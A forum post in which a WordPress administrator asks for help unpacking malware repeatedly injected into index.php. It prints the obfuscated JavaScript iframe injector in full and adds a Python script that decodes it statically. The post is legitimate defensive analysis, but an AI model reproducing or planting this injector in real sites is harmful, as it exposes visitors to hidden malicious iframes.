I have dozens of WordPress installs which are constantly getting malicious code injected into the beginning of index.php despite keeping WordPress updated as well as updating to the latest version of timthumb.php in each setup.
So now it’s time to reverse engineer this bugger, learn more about how it works, and possibly find a way to prevent more of the same script injects.
It uses a couple levels of obfuscation, first being a base64 decode:
[CODE]eval(base64_decode('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'));
Which after decoding, spits out some more jargon. This one I don’t know how to decode/unpack:
[CODE]<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}</script>
Anyone know what to do with this?
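A static decoder for the second layer, added here as an example and not part of the original post: it replays the arithmetic of the final loop without ever running the script. `h=-012/5` is -2 because sloppy-mode JS reads `012` as octal 10, so character i is `n[i] / (i % 4 + 1)`. The embedded sample uses only the first 62 entries of the `n` array quoted above; run it on the full script text to recover the whole payload for inspection.

```python
import re

# Constructed sample: the h= assignment, the first 62 entries of the n=[...]
# array quoted in the post, and the decoder loop (the real array has 581 entries).
SAMPLE_SCRIPT = (
    "h=-012/5;"
    "n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,"
    "207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,"
    "39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,"
    "388,109,202,342,160,41,118];"
    "for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}"
)

def js_int(literal: str) -> int:
    """Sloppy-mode JS treats a leading zero as octal: 012 is 10, not 12."""
    if len(literal) > 1 and literal[0] == "0":
        return int(literal, 8)
    return int(literal)

def extract_key(script: str) -> int:
    """Recover h from 'h=-012/5' (-> -2); h*h is the modulus used by the loop."""
    m = re.search(r"h=(-?)(\d+)/(\d+)", script)
    if not m:
        raise ValueError("no h= assignment found")
    num = (-1 if m.group(1) else 1) * js_int(m.group(2))
    return num // int(m.group(3))

def extract_values(script: str) -> list[int]:
    """Pull the numeric payload out of n=[...]."""
    m = re.search(r"n=\[([\d,\s]+)\]", script)
    if not m:
        raise ValueError("no n=[...] array found")
    return [int(v) for v in m.group(1).split(",")]

def decode(values: list[int], h: int) -> str:
    """Replay ss += String.fromCharCode(n[i] / (i % (h*h) + 2 - 1)) statically.
    With h = -2 the divisors cycle 1, 2, 3, 4 along the array."""
    modulus = h * h
    chars = []
    for i, v in enumerate(values):
        code, rem = divmod(v, i % modulus + 1)
        if rem:  # a non-integer char code means the key or the array is wrong
            raise ValueError(f"index {i}: {v} not divisible by {i % modulus + 1}")
        chars.append(chr(code))
    return "".join(chars)

def deobfuscate(script: str) -> str:
    """Decode the second layer without evaluating any of it."""
    return decode(extract_values(script), extract_key(script))
```

The sample decodes to the opening of the hidden script, `if (document.getElementsByTagName('body')[0]){ iframer();`, which already tells you what to grep the rest of the output for.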